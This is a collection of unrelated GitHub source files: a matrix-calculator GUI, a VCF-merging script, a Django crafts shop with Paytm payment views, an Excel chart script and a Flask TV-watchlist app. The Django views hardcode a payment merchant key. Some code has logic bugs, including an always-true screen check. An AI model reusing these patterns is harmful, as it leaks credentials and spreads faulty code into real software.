homeScreenInit(app)\n calScreenInit(app)\n addScreenInit(app)\n mulScreenInit(app)\n tposeScreenInit(app)\n GEScreenInit(app)\n SOLEScreenInit(app)\n detScreenInit(app)\n dirGraphScreenInit(app)\n\ndef timerFired(app):\n mulScreenTimerFired(app)\n\ndef keyPressed(app, event):\n if app.screen == 'matAdd':\n matAddKeyPressed(app, event)\n elif app.screen == 'matMul':\n matMulKeyPressed(app, event)\n elif app.screen == 'matTpose':\n matTposeKeyPressed(app, event)\n elif app.screen == 'GE':\n GEKeyPressed(app, event)\n elif app.screen == 'SOLE':\n SOLEKeyPressed(app, event)\n elif app.screen == 'det':\n detKeyPressed(app, event)\n elif app.screen == 'dirGraph':\n dirGraphKeyPressed(app, event)\n \n # scrolling for screens\n if app.screen == 'matMulSteps' or 'GESteps' or 'SOLESteps' or 'detSteps': # extend to other steps 
screens\n scrollKeyPressed(app, event)\n\ndef mouseMoved(app, event):\n # For home screen\n if app.screen == 'home':\n for i in range(len(app.buttons[0])):\n app.buttons[0][i].mouseMoved(app, event.x, event.y)\n\n else:\n # back home and back buttons on all other screens\n app.backHomeButton.mouseMoved(app, event.x, event.y)\n app.backButton.mouseMoved(app, event.x, event.y)\n \n if app.screen == 'matCal':\n for i in range(len(app.buttons[1])):\n app.buttons[1][i].mouseMoved(app, event.x, event.y)\n \n elif app.screen == 'matAdd':\n app.solveButton.mouseMoved(app, event.x, event.y)\n app.clearButton.mouseMoved(app, event.x, event.y)\n for i in range(len(app.textBoxes[0][0])):\n app.textBoxes[0][0][i].mouseMoved(app, event.x, event.y)\n app.textBoxes[0][1].mouseMoved(app, event.x, event.y)\n app.textBoxes[0][2].mouseMoved(app, event.x, event.y)\n \n elif app.screen == 'matMul':\n app.solveButton.mouseMoved(app, event.x, event.y)\n app.clearButton.mouseMoved(app, event.x, event.y)\n for i in range(len(app.textBoxes[1][0])):\n app.textBoxes[1][0][i].mouseMoved(app, event.x, event.y)\n for i in range(len(app.textBoxes[1][1])):\n app.textBoxes[1][1][i].mouseMoved(app, event.x, event.y)\n app.textBoxes[1][2].mouseMoved(app, event.x, event.y)\n app.textBoxes[1][3].mouseMoved(app, event.x, event.y)\n \n elif app.screen == 'matMulResult':\n app.stepsButton.mouseMoved(app, event.x, event.y)\n \n elif app.screen == 'matTpose':\n app.solveButton.mouseMoved(app, event.x, event.y)\n app.clearButton.mouseMoved(app, event.x, event.y)\n for i in range(len(app.textBoxes[2][0])):\n app.textBoxes[2][0][i].mouseMoved(app, event.x, event.y)\n app.textBoxes[2][1].mouseMoved(app, event.x, event.y)\n\n elif app.screen == 'GE':\n app.solveButton.mouseMoved(app, event.x, event.y)\n app.clearButton.mouseMoved(app, event.x, event.y)\n for i in range(len(app.textBoxes[3][0])):\n app.textBoxes[3][0][i].mouseMoved(app, event.x, event.y)\n app.textBoxes[3][1].mouseMoved(app, event.x, event.y)\n\n elif app.screen == 'GEResult':\n app.stepsButton.mouseMoved(app, event.x, event.y)\n \n elif app.screen == 'SOLE':\n app.solveButton.mouseMoved(app, event.x, event.y)\n app.clearButton.mouseMoved(app, event.x, event.y)\n for i in range(len(app.textBoxes[4][0])):\n app.textBoxes[4][0][i].mouseMoved(app, event.x, event.y)\n app.textBoxes[4][1].mouseMoved(app, event.x, event.y)\n\n elif app.screen == 'SOLEResult':\n app.stepsButton.mouseMoved(app, event.x, event.y)\n\n elif app.screen == 'det':\n app.solveButton.mouseMoved(app, event.x, event.y)\n app.clearButton.mouseMoved(app, event.x, event.y)\n app.textBoxes[5][0][0].mouseMoved(app, event.x, event.y)\n app.textBoxes[5][1].mouseMoved(app, event.x, event.y)\n\n elif app.screen == 'detResult':\n app.stepsButton.mouseMoved(app, event.x, event.y)\n \n elif app.screen == 'dirGraph':\n app.solveButton.mouseMoved(app, event.x, event.y)\n app.clearButton.mouseMoved(app, event.x, event.y)\n app.textBoxes[6][0][0].mouseMoved(app, event.x, event.y)\n app.textBoxes[6][1].mouseMoved(app, event.x, event.y)\n \n \ndef mousePressed(app, event):\n # For home screen\n if app.screen == 'home':\n for i in range(len(app.buttons[0])):\n if app.buttons[0][i].mousePressed(app, event.x, event.y):\n app.screen = app.screens[i][0]\n else:\n if app.backHomeButton.mousePressed(app, event.x, event.y):\n app.screen = 'home'\n \n if app.screen == 'matCal':\n for i in range(len(app.buttons[1])):\n if app.buttons[1][i].mousePressed(app, event.x, event.y):\n app.screen = app.screens[0][i+1][0]\n \n # For Matrix 
Addition and its sub-screens\n elif app.screen == 'matAdd':\n matAddMousePressed(app, event)\n elif app.screen == 'matAddResult':\n if app.backButton.mousePressed(app, event.x, event.y):\n app.screen = 'matAdd'\n \n # For Matrix Multiplication and its sub-screens\n elif app.screen == 'matMul':\n matMulMousePressed(app, event)\n elif app.screen == 'matMulResult':\n if app.backButton.mousePressed(app, event.x, event.y):\n app.screen = 'matMul'\n if app.stepsButton.mousePressed(app, event.x, event.y):\n app.scrollY = 0 # resets scroll value\n app.screen = 'matMulSteps'\n elif app.screen == 'matMulSteps':\n if app.backButton.mousePressed(app, event.x, event.y):\n app.screen = 'matMulResult'\n \n # For Tranpose and its sub-screens\n elif app.screen == 'matTpose':\n tposeMousePressed(app, event)\n elif app.screen == 'matTposeResult':\n if app.backButton.mousePressed(app, event.x, event.y):\n app.screen = 'matTpose'\n\n # For GE and its sub-screens\n elif app.screen == 'GE':\n GEMousePressed(app, event)\n elif app.screen == 'GEResult':\n if app.backButton.mousePressed(app, event.x, event.y):\n app.screen = 'GE'\n if app.stepsButton.mousePressed(app, event.x, event.y):\n app.scrollY = 0 # resets scroll value\n app.screen = 'GESteps'\n elif app.screen == 'GESteps':\n if app.backButton.mousePressed(app, event.x, event.y):\n app.screen = 'GEResult'\n\n # For SOLE and its sub-screens\n elif app.screen == 'SOLE':\n SOLEMousePressed(app, event)\n elif app.screen == 'SOLEResult':\n if app.backButton.mousePressed(app, event.x, event.y):\n app.screen = 'SOLE'\n if app.stepsButton.mousePressed(app, event.x, event.y):\n app.scrollY = 0 # resets scroll value\n app.screen = 'SOLESteps'\n elif app.screen == 'SOLESteps':\n if app.backButton.mousePressed(app, event.x, event.y):\n app.screen = 'SOLEResult'\n \n # For det and its sub-screens\n elif app.screen == 'det':\n detMousePressed(app, event)\n elif app.screen == 'detResult':\n if app.backButton.mousePressed(app, event.x, event.y):\n app.screen = 'det'\n if app.stepsButton.mousePressed(app, event.x, event.y):\n app.scrollY = 0 # resets scroll value\n app.screen = 'detSteps'\n elif app.screen == 'detSteps':\n if app.backButton.mousePressed(app, event.x, event.y):\n app.screen = 'detResult'\n \n # For dirGraph and its sub-screens\n elif app.screen == 'dirGraph':\n dirGraphMousePressed(app, event)\n elif app.screen == 'dirGraphResult':\n if app.backButton.mousePressed(app, event.x, event.y):\n app.screen = 'dirGraph'\n elif app.screen == 'detSteps':\n if app.backButton.mousePressed(app, event.x, event.y):\n app.screen = 'dirGraphResult'\n\ndef redrawAll(app, canvas):\n canvas.create_rectangle(0, 0, app.width, app.height, width=0, fill='linen')\n if app.screen == 'home': redrawHomeScreen(app, canvas)\n\n elif app.screen == 'matCal': \n redrawMatCalScreen(app,canvas)\n\n elif app.screen == 'matAdd': \n redrawMatAddScreen(app, canvas)\n elif app.screen == 'matAddResult': \n redrawMatAddResultScreen(app, canvas)\n\n elif app.screen == 'matMul': \n redrawMatMulScreen(app, canvas)\n elif app.screen == 'matMulResult': \n redrawMatMulResultScreen(app, canvas)\n elif app.screen == 'matMulSteps': \n redrawMatMulStepsScreen(app, canvas)\n\n elif app.screen == 'matTpose': \n redrawMatTposeScreen(app, canvas)\n elif app.screen == 'matTposeResult': \n redrawMatTposeResultScreen(app, canvas)\n \n elif app.screen == 'GE': \n redrawGEScreen(app, canvas)\n elif app.screen == 'GEResult': \n redrawGEResultScreen(app, canvas)\n elif app.screen == 'GESteps': \n 
redrawGEStepsScreen(app, canvas)\n\n elif app.screen == 'SOLE': \n redrawSOLEScreen(app, canvas)\n elif app.screen == 'SOLEResult': \n redrawSOLEResultScreen(app, canvas)\n elif app.screen == 'SOLESteps': \n redrawSOLEStepsScreen(app, canvas)\n\n elif app.screen == 'det': \n redrawDetScreen(app, canvas)\n elif app.screen == 'detResult':\n redrawDetResultScreen(app, canvas)\n elif app.screen == 'detSteps':\n redrawDetStepsScreen(app, canvas)\n\n elif app.screen == 'dirGraph':\n redrawDirGraphScreen(app, canvas)\n elif app.screen == 'dirGraphResult':\n redrawDirGraphResultScreen(app, canvas)\n\ndef run241ForOne():\n runApp(title=\"241-for-One\")\n\nrun241ForOne()","repo_name":"J4yDubs/241-for-One","sub_path":"TP code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35365649268","text":"from __future__ import absolute_import\nfrom .shears import clip, \\\n remove_dominant_colors, \\\n filter_img, \\\n im_to_color_diffs, \\\n crop_with_color_diffs, \\\n get_longest_match, \\\n load_image, \\\n save_image, \\\n scale_1d_array, \\\n plot_image, \\\n show_image, \\\n plot_1d\n\n__version__ = '0.0.1'","repo_name":"YaleDHLab/shears","sub_path":"shears/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"71935050405","text":"#!/usr/bin/env python\n\nimport glob\nimport os\nimport subprocess\nimport argparse\n\nparser = argparse.ArgumentParser(description=\"Combine GVCFs from multiple intervals with bcftools\")\n\nparser.add_argument('--indir', required=True, help='path to input directory containing vcfs', action='store')\nparser.add_argument('--output', required=True, help='path to output vcf file', action='store')\n\nargs=parser.parse_args()\n\nindir = args.indir\noutput = args.output\n\nvcfs = glob.glob(indir + \"*.g.vcf.gz\")\n\ninputs = \" \".join((f) for f in vcfs)\nprint(inputs)\n\ntemp_dir = indir + '/temp'\n#print(vcfs)\n\n#with open(indir + \"vcflist.list\", \"w\") as filehandle:\n# for listitem in vcfs:\n# filehandle.write('%s\\n' % listitem)\n\nsubprocess.run(args=['bcftools', 'concat', '--threads', '10', inputs])\n#subprocess.run(args=['bcftools', 'sort', '-m', '15G', '-T', temp_dir, '-Oz', '-o', output, 'elata.temp.g.vcf.gz'])\n\n\n\n\n#inputs = \"\\n\".join(\"I={}\".format(f) for f in vcfs)\n#inputs = \"\\n\".join(format(f) for f in vcfs)\n\n#print(inputs)\n\n#f = open(indir + \"vcflist.list\", \"w\")\n#f.write(inputs + \"\\n\")\n#f.close\n\n#outvcf = 'O=' + output\n\n#command = 'picard MergeVcfs ' + inputs + outvcf\n#print(command)\n#invcfs = 'I=' + indir + 'vcflist.list'\n\n\n#print(invcfs)\n#print(dictionary)\n#print(outvcf)\n\n#subprocess.run(args=['picard', 'MergeVcfs', invcfs, outvcf])\n","repo_name":"davidecarlson/snakemake-GATK","sub_path":"scripts/merge_vcfs.py","file_name":"merge_vcfs.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40666275343","text":"#given an array find min amp you can get after changing up to 3 elem.\n\nstrarr = input().split(' ')\narr = []\nfor elem in strarr:\n arr.append(int(elem))\n\narr.sort()\nlasti = len(arr)-1\n\noption1 = arr[lasti-3]-arr[0] # 3 from back\noption2 = arr[lasti-2]-arr[1] # 2 front 1 back\noption3 = arr[lasti-1]-arr[2] # 1 front 2 back\noption4 = 
arr[lasti]-arr[3] # 3 front\n\nprint(min(option1,option2,option3,option4))","repo_name":"sreyaaluri/funsies","sub_path":"google_assessment/minamp.py","file_name":"minamp.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5986494154","text":"from math import ceil\nfrom django.shortcuts import get_object_or_404, render,HttpResponse,redirect\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate,login,logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.template import loader\nfrom datetime import datetime\nfrom django.contrib import messages\nfrom .models import Product,Orders\nfrom PayTm import Checksum\nfrom django.views.decorators.csrf import csrf_exempt\nMERCHANT_KEY = 'kbzk1DSbJiV_03p5'\n\n# Create your views here.\n\ndef index(request):\n    \n    return render(request,'index.html')\n\ndef register(request):\n    if request.method==\"POST\":\n        first_name=request.POST.get('first_name')\n        last_name=request.POST.get('last_name')\n        username=request.POST.get('username')\n        password=request.POST.get('password')\n        \n        user=User.objects.filter(username=username)#this check exists so that submitting an already-taken username at registration doesn't raise a unique constraint error\n        if user.exists():\n            messages.info(request,\"Username already taken\")\n            return redirect('register')\n        \n        \n        user=User.objects.create(\n            first_name=first_name,\n            last_name=last_name,\n            username=username\n        )\n        \n        \n        user.set_password(password)#this is done so that the password is encrypted\n        user.save()\n        \n        messages.info(request,'Account created successfully')\n        \n        return redirect('register')\n    \n    return render(request,'register.html')\n    \n    \n\ndef loginuser(request):\n    if request.method==\"POST\":\n        \n        username=request.POST.get('username')\n        password=request.POST.get('password')\n        \n        if not User.objects.filter(username=username).exists():#to check whether a user with this username exists or not\n            messages.info(request,\"Invalid Username \")\n            return redirect('loginuser')\n        \n        user=authenticate(username=username,password=password)#if the username or password is wrong, this will return None\n        \n        if user is None:\n            messages.info(request,\"Invalid Password\")\n            return redirect('loginuser')\n        \n        else:\n            login(request,user)\n            return redirect('mainpage')\n        \n        \n        \n    return render(request,'index.html')\n\ndef logoutuser(request):\n    logout(request)\n    return redirect('loginuser')\n\n    \n    \n@login_required(login_url=\"loginuser\")\ndef mainpage(request):\n    return render(request,'mainpage.html')\n\n@login_required(login_url=\"loginuser\")\ndef dreamcatchers(request):\n    products=Product.objects.all()\n    \n    allProds=[]\n    catprods=Product.objects.values('category','id')\n    #print(catprods)\n    cats={item['category'] for item in catprods}\n    #print(\"categories are \",cats)\n    for cat in cats:\n        prod=Product.objects.filter(category=cat)\n        print(prod)\n        n=len(prod)\n        nslides=n//4 + ceil((n/4)-(n//4))\n        allProds.append([prod,range(1,nslides),nslides])\n    #print(allProds) \n    params={'allProds':allProds}\n    return render(request,'dreamcatchers.html',params)\n\n# @login_required(login_url=\"loginuser\")\n# def resinproducts(request):\n#     products=Product.objects.all()\n#     print(products)\n#     return render(request,'resinproducts.html',context={'products':products})\n\n\n    \n\ndef checkout(request):\n    thank=False\n    if request.method==\"POST\":\n        items_json = 
request.POST.get('itemsJson', '')\n        name = request.POST.get('name', '')\n        amount = request.POST.get('amount', '')\n        email = request.POST.get('email', '')\n        address = request.POST.get('address1', '') + \" \" + request.POST.get('address2', '')\n        city = request.POST.get('city', '')\n        state = request.POST.get('state', '')\n        zip_code = request.POST.get('zip_code', '')\n        phone = request.POST.get('phone', '')\n        order = Orders(items_json=items_json, name=name, email=email, address=address, city=city,\n                       state=state, zip_code=zip_code, phone=phone,amount=amount)\n        order.save()\n        \n        thank = True\n        id = order.order_id\n        param_dict = {\n\n            'MID': 'muFqPO48357187186180',\n            'ORDER_ID': str(order.order_id),\n            'TXN_AMOUNT': str(amount),\n            'CUST_ID': email,\n            'INDUSTRY_TYPE_ID': 'Retail',\n            'WEBSITE': 'WEBSTAGING',\n            'CHANNEL_ID': 'WEB',\n            'CALLBACK_URL':'http://127.0.0.1:8000/handlerequest',\n\n        }\n        \n        #return render(request, 'checkout.html', {'thank':thank, 'id': id})\n        param_dict['CHECKSUMHASH'] = Checksum.generate_checksum(param_dict, MERCHANT_KEY)\n        return render(request, 'paytm.html', {'param_dict': param_dict})\n    return render(request, 'checkout.html')\n\n\n@csrf_exempt\ndef handlerequest(request):\n    # Paytm will send a POST request here\n    form = request.POST\n    response_dict = {}\n    for i in form.keys():\n        response_dict[i] = form[i]\n        if i == 'CHECKSUMHASH':\n            checksum = form[i]\n\n    verify = Checksum.verify_checksum(response_dict, MERCHANT_KEY, checksum)\n    if verify:\n        if response_dict['RESPCODE'] == '01':\n            print('order successful')\n        else:\n            print('order was not successful because ' + response_dict['RESPMSG'])\n    return render(request, 'paymentstatus.html', {'response': response_dict})\n\n\n    \n@login_required(login_url=\"loginuser\")\ndef gallery(request):\n    \n    \n    return render(request,'gallery.html')","repo_name":"PULAK-0308/cc","sub_path":"crafts website/ecommerce/craft/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15110126630","text":"#coding: utf8\nimport xlsxwriter\n\n# create an excel file\nworkbook = xlsxwriter.Workbook('PieChart.xls')\n# create a worksheet (sheet tab) object\nworksheet = workbook.add_worksheet('game') #u'数据报表'\n# create a chart object, type: pie (pie chart)\nchart = workbook.add_chart({'type':'pie'})\n# define the table header list\ntitle = [u'游戏名称',u'星期一',u'星期二',u'星期三',u'星期四',u'星期五',u'星期六',u'星期日',u'总时长']\n# define the list of game names\nbuname = [u'英雄联盟',u'王者荣耀',u'洛奇英雄转',u'剑灵',u'龙之谷']\n# define the data\ndata = [\n    [150,152,158,149,155,145,148],\n    [89,88,95,93,98,100,99],\n    [201,200,198,175,170,198,195],\n    [75,77,78,78,74,70,79],\n    [88,85,87,90,93,88,84]\n]\n\n# define the format object\nformat = workbook.add_format()\n# give the format object a bold (1 pixel) cell border\nformat.set_border(1)\n\n# define the format_title format object\nformat_title = workbook.add_format()\nformat_title.set_border(1)\n# set the cell background color for format_title\nformat_title.set_bg_color('#cccccc')\n\n# define the format_ave cell format\nformat_ave = workbook.add_format()\nformat_ave.set_border(1)\n# set the number display format for format_ave (2 decimal places)\nformat_ave.set_num_format('0.00')\n\n# write the data into the xls file\n#write row by row\nworksheet.write_row('A1',title,format_title)\nworksheet.write_column('A2',buname,format)\nworksheet.write_row('B2',data[0],format)\nworksheet.write_row('B3',data[1],format)\nworksheet.write_row('B4',data[2],format)\nworksheet.write_row('B5',data[3],format)\nworksheet.write_row('B6',data[4],format)\n\n# define the chart data series function\ndef chart_series(cur_row):\n    '''\n    build the chart data series (weekly totals)\n    :param cur_row: row number, String type\n    :return:\n    '''\n    # compute the weekly total play time (SUM function)\n    
worksheet.write_formula('I'+cur_row,'=SUM(B'+cur_row+':H'+cur_row+')',format_ave)\n\n\n# Run the chart data series function for data rows 2-6\nfor row in range(2,7):\n chart_series(str(row))\n\nchart.add_series({\n 'name': u'游戏时长周报图表',\n 'categories': '=game!$A$2:$A$6',\n 'values': '=game!$I$2:$I$6',\n 'points':[\n {'fill':{'color':'#00CD00'}},\n {'fill':{'color':'red'}},\n {'fill':{'color':'yellow'}},\n {'fill':{'color':'gray'}},\n ],\n })\nchart.set_style(2)\n# Set the chart title\nchart.set_title({'name':u'游戏时长周报图表'})\n# Set the y-axis (left) caption\nchart.set_y_axis({'name': u'h(小时)'})\n# chart.set_y_2axis()\n\n#Insert the chart at cell A8\nworksheet.insert_chart('A8', chart, {'x_offset': 25, 'y_offset': 10})\n\n# Close the xls file\nworkbook.close()","repo_name":"1182640071/writeXls","sub_path":"writePie.py","file_name":"writePie.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"14765306292","text":"\"\"\"\nThe flask application.\n\"\"\"\n\n# standard library full imports\nimport sqlite3\n\n# standard library partial imports\nfrom dataclasses import dataclass\nfrom typing import Any, Union\n\n# third party library partial imports\nfrom flask import Flask, redirect, render_template, request, url_for\n\n@dataclass\nclass ArrowverseShow():\n \"\"\"\n The ArrowverseShow class represents a show in the Arrowverse.\n \"\"\"\n showname: str\n show_image: str\n background_color: str = \"#000000\"\n foreground_color: str = \"#ffffff\"\n\n@dataclass\nclass ArrowverseShowEpisode:\n \"\"\"\n The ArrowverseShowEpisode class represents an episode in the Arrowverse.\n \"\"\"\n showname: str\n episode_id: int\n season: int\n episode: int\n name: str\n airdate: str\n image: str\n background_color: str = \"#000000\"\n foreground_color: str = \"#ffffff\"\n watched: int = 0\n\n@dataclass\nclass EpisodeWatchState:\n \"\"\"\n The EpisodeWatchState class represents the watched status of an episode.\n \"\"\"\n episode_id: int\n watched: int = 0\n\napp = Flask(__name__)\n\ndef get_shows() -> list[ArrowverseShow]:\n \"\"\"\n Create a list of ArrowverseShow objects from the database.\n\n Parameters:\n None\n Returns:\n list[ArrowverseShow]: A list of ArrowverseShow objects\n \"\"\"\n\n # Create a connection to the database\n with sqlite3.connect('arrowverse.db') as conn:\n\n # Create a cursor\n c: sqlite3.Cursor = conn.cursor()\n\n # Create a list of ArrowverseShow objects\n arrowverse_shows: list[ArrowverseShow] = []\n\n # Get all the episodes from the database\n c.execute(\n \"\"\"\n SELECT\n Shows.Name,\n Shows.Image,\n Shows.BackgroundColor,\n Shows.ForegroundColor\n From\n Shows\n \"\"\"\n )\n\n # Loop through the results\n for row in c.fetchall():\n\n # Create an ArrowverseShow object\n arrowverse_show: ArrowverseShow = ArrowverseShow(\n showname=row[0],\n show_image=row[1],\n background_color=row[2],\n foreground_color=row[3]\n )\n\n # Add the ArrowverseShow object to the list\n arrowverse_shows.append(arrowverse_show)\n\n # Return the list of ArrowverseShow objects\n return arrowverse_shows\n\ndef get_list_of_episodes(watchlist_uuid: Union[str, None] = None) -> list[ArrowverseShowEpisode]:\n \"\"\"\n Create a list of ArrowverseShowEpisode objects from the database.\n\n Parameters:\n watchlist_uuid (Union[str, None], optional): The watchlist uuid. 
Defaults to None.\n Returns:\n list[ArrowverseShowEpisode]: A list of ArrowverseShowEpisode objects\n \"\"\"\n\n arrowverse_shows: list[ArrowverseShowEpisode] = []\n\n # Create a connection to the database\n with sqlite3.connect('arrowverse.db') as conn:\n\n # Create a cursor\n c: sqlite3.Cursor = conn.cursor()\n\n # Create a list of ArrowverseShow objects\n\n query: str = \"\"\"\n SELECT\n Episodes.EpisodeId,\n Shows.Name,\n Seasons.SeasonNumber,\n Episodes.EpisodeNumber,\n Episodes.Name,\n Episodes.AirDate,\n Episodes.Image,\n Shows.BackgroundColor,\n Shows.ForegroundColor\n FROM Shows\n JOIN Seasons\n ON Shows.ShowId = Seasons.ShowId\n JOIN Episodes\n ON Seasons.SeasonId = Episodes.SeasonId\n ORDER BY Episodes.AirDate ASC\n \"\"\"\n params: tuple = ()\n\n if type(watchlist_uuid) == str:\n # get the episode details like normal, but also get the watched status from the watchlist if it exists\n # the uuid is passed as a bound parameter so it cannot inject SQL\n query = \"\"\"\n SELECT \n Episodes.EpisodeId,\n Shows.Name AS ShowName,\n Seasons.SeasonNumber,\n Episodes.EpisodeNumber,\n Episodes.Name AS EpisodeName,\n Episodes.AirDate,\n Episodes.Image,\n Shows.BackgroundColor,\n Shows.ForegroundColor,\n CASE\n WHEN WatchlistItems.Watched IS NOT NULL \n THEN WatchlistItems.Watched \n ELSE 0 \n END \n AS Watched\n FROM Episodes\n JOIN Seasons\n ON Episodes.SeasonId = Seasons.SeasonId\n JOIN Shows\n ON Seasons.ShowId = Shows.ShowId\n LEFT JOIN\n (\n SELECT DISTINCT EpisodeId, Watched\n FROM WatchlistItems\n JOIN Watchlists\n ON WatchlistItems.WatchlistId = Watchlists.WatchlistId\n WHERE Watchlists.WatchlistUUID = ?\n ) AS WatchlistItems\n ON Episodes.EpisodeId = WatchlistItems.EpisodeId\n ORDER BY Episodes.AirDate ASC;\n \"\"\"\n params = (watchlist_uuid,)\n\n # Get all the episodes from the database\n c.execute(query, params)\n\n # Loop through the results\n for row in c.fetchall():\n\n # Create an ArrowverseShow object\n if len(row) == 9: # if the watchlist_uuid is not provided, then the row will only have 9 columns\n row = list(row)\n row.append(0) # add the watched status to the end of the row\n row = tuple(row)\n\n arrowverse_show: ArrowverseShowEpisode = ArrowverseShowEpisode(\n episode_id=row[0],\n showname=row[1],\n season=row[2],\n episode=row[3],\n name=row[4],\n airdate=row[5],\n image=row[6],\n background_color=row[7],\n foreground_color=row[8],\n watched=row[9]\n )\n\n # Add the ArrowverseShow object to the list\n arrowverse_shows.append(arrowverse_show)\n\n # Return the list of ArrowverseShow objects\n return arrowverse_shows\n\ndef get_watchlist_display_name(uuid: Union[str, None]) -> Union[str, None]:\n \"\"\"\n Get the display name of a watchlist from the database.\n\n Parameters:\n uuid (Union[str, None]): The uuid of the watchlist.\n Returns:\n Union[str, None]: The display name of the watchlist or None if the watchlist does not exist.\n \"\"\"\n\n if type(uuid) != str:\n return None\n\n # Create a connection to the database\n with sqlite3.connect('arrowverse.db') as conn:\n\n # Create a cursor\n c: sqlite3.Cursor = conn.cursor()\n\n c.execute(\"\"\"\n SELECT\n DisplayName\n FROM\n Watchlists\n Where\n WatchlistUUID = ?\n \"\"\", (uuid,))\n result: Any = c.fetchone()\n\n # check if the watchlist exists\n if result is None:\n return None\n\n # get the display name\n display_name: str = result[0]\n\n return display_name\n\ndef ensure_watchlist_exists(watchlist_uuid: str, watchlist_display_name: str) -> None:\n \"\"\"\n Ensure that a watchlist exists in the database. 
If it does not exist, create it.\n\n Parameters:\n watchlist_uuid (str): The uuid of the watchlist.\n watchlist_display_name (str): The display name of the watchlist.\n Returns:\n None\n \"\"\"\n\n with sqlite3.connect('arrowverse.db') as conn:\n\n # Create a cursor\n c: sqlite3.Cursor = conn.cursor()\n\n c.execute(\"\"\"\n SELECT\n WatchlistId\n FROM\n Watchlists\n WHERE\n WatchlistUUID = ?\n \"\"\", (watchlist_uuid, ))\n\n result: Any = c.fetchone()\n\n if result:\n return\n\n c.execute(\"\"\"\n INSERT\n INTO Watchlists (\n WatchlistUUID,\n DisplayName\n )\n VALUES (\n ?,\n ?\n ) \n \"\"\", (\n watchlist_uuid,\n watchlist_display_name\n ))\n\n conn.commit()\n return\n\ndef get_watchlist_id(watchlist_uuid: str) -> int:\n \"\"\"\n Get the id of a watchlist from the database.\n\n Parameters:\n watchlist_uuid (str): The uuid of the watchlist.\n Returns:\n int: The id of the watchlist or -1 if the watchlist does not exist.\n \"\"\"\n\n with sqlite3.connect('arrowverse.db') as conn:\n\n # Create a cursor\n c: sqlite3.Cursor = conn.cursor()\n\n c.execute(\"\"\"\n SELECT\n WatchlistId\n FROM\n Watchlists\n WHERE\n WatchlistUUID = ?\n \"\"\", (watchlist_uuid, ))\n\n result: Any = c.fetchone()\n\n # check if the watchlist exists\n if result is None:\n return -1\n\n watchlist_id: int = result[0]\n\n return watchlist_id\n\ndef add_episodes(watchlist_uuid: str, watchlist_display_name: str, episode_watch_states: list[EpisodeWatchState]) -> None:\n \"\"\"\n Add episodes to a watchlist.\n\n Parameters:\n watchlist_uuid (str): The uuid of the watchlist.\n watchlist_display_name (str): The display name of the watchlist.\n episode_watch_states (list[EpisodeWatchState]): A list of EpisodeWatchState objects.\n Returns:\n None\n \"\"\"\n # check if the watchlist exists\n ensure_watchlist_exists(watchlist_uuid, watchlist_display_name)\n\n # get the watchlist id\n watchlist_id: int = get_watchlist_id(watchlist_uuid)\n\n if watchlist_id == -1:\n return\n\n with sqlite3.connect('arrowverse.db') as conn:\n\n # Create a cursor\n c: sqlite3.Cursor = conn.cursor()\n\n for episode_watch_state in episode_watch_states:\n episode_id: int = episode_watch_state.episode_id\n watched: int = episode_watch_state.watched\n\n c.execute(\"\"\"\n SELECT\n WatchlistItemId\n FROM\n WatchlistItems\n WHERE\n WatchlistId = ?\n AND EpisodeId = ?\n \"\"\", (watchlist_id, episode_id))\n\n result: Any = c.fetchall()\n\n query: str = \"\"\"\n INSERT\n INTO WatchlistItems (\n WatchlistId,\n EpisodeId,\n Watched\n )\n VALUES (\n :watchlist_id,\n :episode_id,\n :watched\n )\n \"\"\"\n\n if len(result) != 0:\n query = \"\"\"\n UPDATE\n WatchlistItems\n SET\n Watched = :watched\n WHERE\n WatchlistId = :watchlist_id\n AND EpisodeId = :episode_id\n \"\"\"\n\n c.execute(query, {\n \"watchlist_id\": watchlist_id,\n \"episode_id\": episode_id,\n \"watched\": watched\n })\n\n conn.commit()\n\ndef filter_arrowverse_items(\n shows: list[Any],\n allowed_shows: str\n) -> list[Any]:\n\n showname_map: dict[str, str] = {\n 'dclot': 'DC Legends of Tomorrow',\n 'tf': 'The Flash',\n 'a': 'Arrow',\n 'sg': 'Supergirl',\n 'bw': 'Batwoman',\n 'bl': 'Black Lightning',\n }\n\n shownames_list: list[str] = allowed_shows.split(',')\n\n shownames_list = [showname_map.get(showname, \"N/a\")\n for showname in shownames_list]\n \n shownames_list = [showname for showname in shownames_list if showname != \"N/a\"]\n\n if len(shownames_list) == 0:\n return shows\n\n return [\n item\n for item in shows\n if item.showname in shownames_list\n ]\n\n@app.route('/')\ndef index():\n 
\"\"\"\n The index route.\n\n Parameters:\n None\n Returns:\n str: The rendered template\n \"\"\"\n\n # Get the query parameters\n shownames: Union[str, None] = request.args.get('shownames')\n watchlist_uuid: Union[str, None] = request.args.get('watchlist')\n watchlist_display_name: Union[str, None] = get_watchlist_display_name(\n watchlist_uuid)\n\n # Create a list of ArrowverseShow objects\n arrowverse_shows: list[ArrowverseShow] = get_shows()\n\n # Create a list of ArrowverseShowEpisode objects\n arrowverse_episodes: list[ArrowverseShowEpisode] = get_list_of_episodes(\n watchlist_uuid=watchlist_uuid)\n\n if type(shownames) == str:\n\n temp: list[Any] = filter_arrowverse_items(arrowverse_shows, shownames)\n\n if not all(isinstance(item, ArrowverseShow) for item in temp):\n raise TypeError(\"Not all elements are ArrowverseShow\")\n\n arrowverse_shows = temp\n\n temp = filter_arrowverse_items(arrowverse_episodes, shownames)\n\n if not all(isinstance(item, ArrowverseShowEpisode) for item in temp):\n raise TypeError(\"Not all elements are ArrowverseShowEpisode\")\n\n arrowverse_episodes = temp\n\n # Render the template\n return render_template(\n 'index.html',\n watchlist_uuid=watchlist_uuid,\n 